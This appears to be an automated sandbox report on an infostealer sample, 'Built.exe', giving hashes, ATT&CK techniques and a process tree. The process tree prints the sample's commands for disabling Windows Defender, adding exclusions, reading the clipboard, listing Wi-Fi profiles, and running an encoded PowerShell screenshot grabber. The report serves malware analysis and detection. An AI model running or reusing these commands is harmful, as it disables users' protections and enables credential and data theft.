dbcad9d73a4a7b3bcf63122cc4dbb44a68f7af6e818c5d69802ebb150ba5c207

Analysis

max time kernel
150s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
03-11-2024 10:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built.exe
Size

7.5MB
MD5

8785ce235de3c76deefe56b9251c1a13
SHA1

b4da04cbaa3da390d2e6bb6207dc160d79e6a997
SHA256

dbcad9d73a4a7b3bcf63122cc4dbb44a68f7af6e818c5d69802ebb150ba5c207
SHA512

c8d7267e09075c420c50310542f64e4dc09f348c3beea55d30e967eccd2e5dbdc88accb51fd5ed23b19e48614c260a53e6051813c2f0e63b64d005caf1cbe173
SSDEEP

196608:NBQCwuL+YurErvI9pWjgN3ZdahF0pbH1AY7CtQsNI/Sx3C10:YdYurEUWjqeWxA6nAY0

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2072	powershell.exe
2004	powershell.exe
2304	powershell.exe
4140	powershell.exe
2824	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3024	cmd.exe
3668	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4940	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4760	Built.exe
4760	Built.exe
4760	Built.exe
4760	Built.exe
4760	Built.exe
4760	Built.exe
4760	Built.exe
4760	Built.exe
4760	Built.exe
4760	Built.exe
4760	Built.exe
4760	Built.exe
4760	Built.exe
4760	Built.exe
4760	Built.exe
4760	Built.exe
4760	Built.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
22	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
3232	tasklist.exe
3236	tasklist.exe
2028	tasklist.exe
3224	tasklist.exe

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023c73-21.dat	upx
behavioral2/memory/4760-25-0x00007FFBA8E80000-0x00007FFBA9544000-memory.dmp	upx
behavioral2/files/0x0008000000023c5e-27.dat	upx
behavioral2/files/0x0007000000023c71-29.dat	upx
behavioral2/files/0x0007000000023c6d-46.dat	upx
behavioral2/memory/4760-48-0x00007FFBBDBE0000-0x00007FFBBDBEF000-memory.dmp	upx
behavioral2/memory/4760-47-0x00007FFBBC700000-0x00007FFBBC725000-memory.dmp	upx
behavioral2/files/0x0008000000023c64-45.dat	upx
behavioral2/files/0x0008000000023c63-44.dat	upx
behavioral2/files/0x0008000000023c62-43.dat	upx
behavioral2/files/0x0008000000023c61-42.dat	upx
behavioral2/files/0x0008000000023c60-41.dat	upx
behavioral2/files/0x0008000000023c5f-40.dat	upx
behavioral2/files/0x0008000000023c5d-39.dat	upx
behavioral2/files/0x0007000000023c78-38.dat	upx
behavioral2/files/0x0007000000023c77-37.dat	upx
behavioral2/files/0x0007000000023c76-36.dat	upx
behavioral2/files/0x0007000000023c72-33.dat	upx
behavioral2/files/0x0007000000023c70-32.dat	upx
behavioral2/memory/4760-54-0x00007FFBB98A0000-0x00007FFBB98CD000-memory.dmp	upx
behavioral2/memory/4760-56-0x00007FFBB91D0000-0x00007FFBB91EA000-memory.dmp	upx
behavioral2/memory/4760-58-0x00007FFBB91A0000-0x00007FFBB91C4000-memory.dmp	upx
behavioral2/memory/4760-60-0x00007FFBB8600000-0x00007FFBB877F000-memory.dmp	upx
behavioral2/memory/4760-62-0x00007FFBB9180000-0x00007FFBB9199000-memory.dmp	upx
behavioral2/memory/4760-64-0x00007FFBBDBD0000-0x00007FFBBDBDD000-memory.dmp	upx
behavioral2/memory/4760-69-0x00007FFBB9140000-0x00007FFBB9173000-memory.dmp	upx
behavioral2/memory/4760-71-0x00007FFBA8700000-0x00007FFBA8C29000-memory.dmp	upx
behavioral2/memory/4760-68-0x00007FFBA8E80000-0x00007FFBA9544000-memory.dmp	upx
behavioral2/memory/4760-72-0x00007FFBB8B30000-0x00007FFBB8BFD000-memory.dmp	upx
behavioral2/memory/4760-76-0x00007FFBB9120000-0x00007FFBB9134000-memory.dmp	upx
behavioral2/memory/4760-75-0x00007FFBBC700000-0x00007FFBBC725000-memory.dmp	upx
behavioral2/memory/4760-78-0x00007FFBBC7C0000-0x00007FFBBC7CD000-memory.dmp	upx
behavioral2/memory/4760-83-0x00007FFBB8360000-0x00007FFBB847B000-memory.dmp	upx
behavioral2/memory/4760-188-0x00007FFBB91A0000-0x00007FFBB91C4000-memory.dmp	upx
behavioral2/memory/4760-219-0x00007FFBB8600000-0x00007FFBB877F000-memory.dmp	upx
behavioral2/memory/4760-298-0x00007FFBA8700000-0x00007FFBA8C29000-memory.dmp	upx
behavioral2/memory/4760-301-0x00007FFBB9140000-0x00007FFBB9173000-memory.dmp	upx
behavioral2/memory/4760-321-0x00007FFBB8B30000-0x00007FFBB8BFD000-memory.dmp	upx
behavioral2/memory/4760-326-0x00007FFBBC700000-0x00007FFBBC725000-memory.dmp	upx
behavioral2/memory/4760-325-0x00007FFBA8E80000-0x00007FFBA9544000-memory.dmp	upx
behavioral2/memory/4760-331-0x00007FFBB8600000-0x00007FFBB877F000-memory.dmp	upx
behavioral2/memory/4760-340-0x00007FFBA8E80000-0x00007FFBA9544000-memory.dmp	upx
behavioral2/memory/4760-454-0x00007FFBB9140000-0x00007FFBB9173000-memory.dmp	upx
behavioral2/memory/4760-459-0x00007FFBB8360000-0x00007FFBB847B000-memory.dmp	upx
behavioral2/memory/4760-458-0x00007FFBBC7C0000-0x00007FFBBC7CD000-memory.dmp	upx
behavioral2/memory/4760-457-0x00007FFBB9120000-0x00007FFBB9134000-memory.dmp	upx
behavioral2/memory/4760-456-0x00007FFBA8700000-0x00007FFBA8C29000-memory.dmp	upx
behavioral2/memory/4760-455-0x00007FFBA8E80000-0x00007FFBA9544000-memory.dmp	upx
behavioral2/memory/4760-453-0x00007FFBBDBD0000-0x00007FFBBDBDD000-memory.dmp	upx
behavioral2/memory/4760-452-0x00007FFBB9180000-0x00007FFBB9199000-memory.dmp	upx
behavioral2/memory/4760-451-0x00007FFBB8600000-0x00007FFBB877F000-memory.dmp	upx
behavioral2/memory/4760-450-0x00007FFBB91A0000-0x00007FFBB91C4000-memory.dmp	upx
behavioral2/memory/4760-449-0x00007FFBB91D0000-0x00007FFBB91EA000-memory.dmp	upx
behavioral2/memory/4760-448-0x00007FFBB98A0000-0x00007FFBB98CD000-memory.dmp	upx
behavioral2/memory/4760-447-0x00007FFBB8B30000-0x00007FFBB8BFD000-memory.dmp	upx
behavioral2/memory/4760-446-0x00007FFBBC700000-0x00007FFBBC725000-memory.dmp	upx
behavioral2/memory/4760-445-0x00007FFBBDBE0000-0x00007FFBBDBEF000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4132	cmd.exe
1680	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
540	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3684	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
4140	powershell.exe
2072	powershell.exe
2824	powershell.exe
2824	powershell.exe
2072	powershell.exe
2072	powershell.exe
4140	powershell.exe
4140	powershell.exe
3668	powershell.exe
3668	powershell.exe
2824	powershell.exe
2824	powershell.exe
1536	powershell.exe
3668	powershell.exe
1536	powershell.exe
1536	powershell.exe
2004	powershell.exe
2004	powershell.exe
2008	powershell.exe
2008	powershell.exe
2304	powershell.exe
2304	powershell.exe
3024	powershell.exe
3024	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4140	powershell.exe
Token: SeDebugPrivilege	2072	powershell.exe
Token: SeDebugPrivilege	3224	tasklist.exe
Token: SeDebugPrivilege	2824	powershell.exe
Token: SeDebugPrivilege	3232	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4168	WMIC.exe
Token: SeSecurityPrivilege	4168	WMIC.exe
Token: SeTakeOwnershipPrivilege	4168	WMIC.exe
Token: SeLoadDriverPrivilege	4168	WMIC.exe
Token: SeSystemProfilePrivilege	4168	WMIC.exe
Token: SeSystemtimePrivilege	4168	WMIC.exe
Token: SeProfSingleProcessPrivilege	4168	WMIC.exe
Token: SeIncBasePriorityPrivilege	4168	WMIC.exe
Token: SeCreatePagefilePrivilege	4168	WMIC.exe
Token: SeBackupPrivilege	4168	WMIC.exe
Token: SeRestorePrivilege	4168	WMIC.exe
Token: SeShutdownPrivilege	4168	WMIC.exe
Token: SeDebugPrivilege	4168	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4168	WMIC.exe
Token: SeRemoteShutdownPrivilege	4168	WMIC.exe
Token: SeUndockPrivilege	4168	WMIC.exe
Token: SeManageVolumePrivilege	4168	WMIC.exe
Token: 33	4168	WMIC.exe
Token: 34	4168	WMIC.exe
Token: 35	4168	WMIC.exe
Token: 36	4168	WMIC.exe
Token: SeDebugPrivilege	3236	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4168	WMIC.exe
Token: SeSecurityPrivilege	4168	WMIC.exe
Token: SeTakeOwnershipPrivilege	4168	WMIC.exe
Token: SeLoadDriverPrivilege	4168	WMIC.exe
Token: SeSystemProfilePrivilege	4168	WMIC.exe
Token: SeSystemtimePrivilege	4168	WMIC.exe
Token: SeProfSingleProcessPrivilege	4168	WMIC.exe
Token: SeIncBasePriorityPrivilege	4168	WMIC.exe
Token: SeCreatePagefilePrivilege	4168	WMIC.exe
Token: SeBackupPrivilege	4168	WMIC.exe
Token: SeRestorePrivilege	4168	WMIC.exe
Token: SeShutdownPrivilege	4168	WMIC.exe
Token: SeDebugPrivilege	4168	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4168	WMIC.exe
Token: SeRemoteShutdownPrivilege	4168	WMIC.exe
Token: SeUndockPrivilege	4168	WMIC.exe
Token: SeManageVolumePrivilege	4168	WMIC.exe
Token: 33	4168	WMIC.exe
Token: 34	4168	WMIC.exe
Token: 35	4168	WMIC.exe
Token: 36	4168	WMIC.exe
Token: SeDebugPrivilege	3668	powershell.exe
Token: SeDebugPrivilege	1536	powershell.exe
Token: SeDebugPrivilege	2028	tasklist.exe
Token: SeDebugPrivilege	2004	powershell.exe
Token: SeDebugPrivilege	2008	powershell.exe
Token: SeIncreaseQuotaPrivilege	2160	WMIC.exe
Token: SeSecurityPrivilege	2160	WMIC.exe
Token: SeTakeOwnershipPrivilege	2160	WMIC.exe
Token: SeLoadDriverPrivilege	2160	WMIC.exe
Token: SeSystemProfilePrivilege	2160	WMIC.exe
Token: SeSystemtimePrivilege	2160	WMIC.exe
Token: SeProfSingleProcessPrivilege	2160	WMIC.exe
Token: SeIncBasePriorityPrivilege	2160	WMIC.exe
Token: SeCreatePagefilePrivilege	2160	WMIC.exe
Token: SeBackupPrivilege	2160	WMIC.exe
Token: SeRestorePrivilege	2160	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3508 wrote to memory of 4760	3508	Built.exe	84
PID 3508 wrote to memory of 4760	3508	Built.exe	84
PID 4760 wrote to memory of 208	4760	Built.exe	88
PID 4760 wrote to memory of 208	4760	Built.exe	88
PID 4760 wrote to memory of 528	4760	Built.exe	89
PID 4760 wrote to memory of 528	4760	Built.exe	89
PID 4760 wrote to memory of 4648	4760	Built.exe	92
PID 4760 wrote to memory of 4648	4760	Built.exe	92
PID 528 wrote to memory of 2072	528	cmd.exe	94
PID 528 wrote to memory of 2072	528	cmd.exe	94
PID 208 wrote to memory of 4140	208	cmd.exe	95
PID 208 wrote to memory of 4140	208	cmd.exe	95
PID 4760 wrote to memory of 2172	4760	Built.exe	96
PID 4760 wrote to memory of 2172	4760	Built.exe	96
PID 4760 wrote to memory of 636	4760	Built.exe	97
PID 4760 wrote to memory of 636	4760	Built.exe	97
PID 4648 wrote to memory of 2824	4648	cmd.exe	100
PID 4648 wrote to memory of 2824	4648	cmd.exe	100
PID 2172 wrote to memory of 3224	2172	cmd.exe	101
PID 2172 wrote to memory of 3224	2172	cmd.exe	101
PID 636 wrote to memory of 3232	636	cmd.exe	102
PID 636 wrote to memory of 3232	636	cmd.exe	102
PID 4760 wrote to memory of 4588	4760	Built.exe	103
PID 4760 wrote to memory of 4588	4760	Built.exe	103
PID 4760 wrote to memory of 3024	4760	Built.exe	104
PID 4760 wrote to memory of 3024	4760	Built.exe	104
PID 4760 wrote to memory of 1232	4760	Built.exe	107
PID 4760 wrote to memory of 1232	4760	Built.exe	107
PID 4760 wrote to memory of 4496	4760	Built.exe	110
PID 4760 wrote to memory of 4496	4760	Built.exe	110
PID 4760 wrote to memory of 4132	4760	Built.exe	111
PID 4760 wrote to memory of 4132	4760	Built.exe	111
PID 4588 wrote to memory of 4168	4588	cmd.exe	141
PID 4588 wrote to memory of 4168	4588	cmd.exe	141
PID 4760 wrote to memory of 4360	4760	Built.exe	114
PID 4760 wrote to memory of 4360	4760	Built.exe	114
PID 4760 wrote to memory of 2844	4760	Built.exe	116
PID 4760 wrote to memory of 2844	4760	Built.exe	116
PID 1232 wrote to memory of 3236	1232	cmd.exe	119
PID 1232 wrote to memory of 3236	1232	cmd.exe	119
PID 4760 wrote to memory of 5064	4760	Built.exe	120
PID 4760 wrote to memory of 5064	4760	Built.exe	120
PID 3024 wrote to memory of 3668	3024	cmd.exe	121
PID 3024 wrote to memory of 3668	3024	cmd.exe	121
PID 4360 wrote to memory of 3684	4360	cmd.exe	123
PID 4360 wrote to memory of 3684	4360	cmd.exe	123
PID 4132 wrote to memory of 1680	4132	cmd.exe	124
PID 4132 wrote to memory of 1680	4132	cmd.exe	124
PID 4496 wrote to memory of 3752	4496	cmd.exe	125
PID 4496 wrote to memory of 3752	4496	cmd.exe	125
PID 2844 wrote to memory of 2992	2844	cmd.exe	126
PID 2844 wrote to memory of 2992	2844	cmd.exe	126
PID 5064 wrote to memory of 1536	5064	cmd.exe	127
PID 5064 wrote to memory of 1536	5064	cmd.exe	127
PID 4760 wrote to memory of 1736	4760	Built.exe	128
PID 4760 wrote to memory of 1736	4760	Built.exe	128
PID 4760 wrote to memory of 4816	4760	Built.exe	153
PID 4760 wrote to memory of 4816	4760	Built.exe	153
PID 1736 wrote to memory of 1820	1736	cmd.exe	132
PID 1736 wrote to memory of 1820	1736	cmd.exe	132
PID 4816 wrote to memory of 2812	4816	cmd.exe	133
PID 4816 wrote to memory of 2812	4816	cmd.exe	133
PID 4760 wrote to memory of 2004	4760	Built.exe	157
PID 4760 wrote to memory of 2004	4760	Built.exe	157

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2812	attrib.exe
5032	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3508
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:208
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:528
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4648
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2172
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:636
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4588
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3024
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1232
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4496
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:4132
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4360
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2844
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:2992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
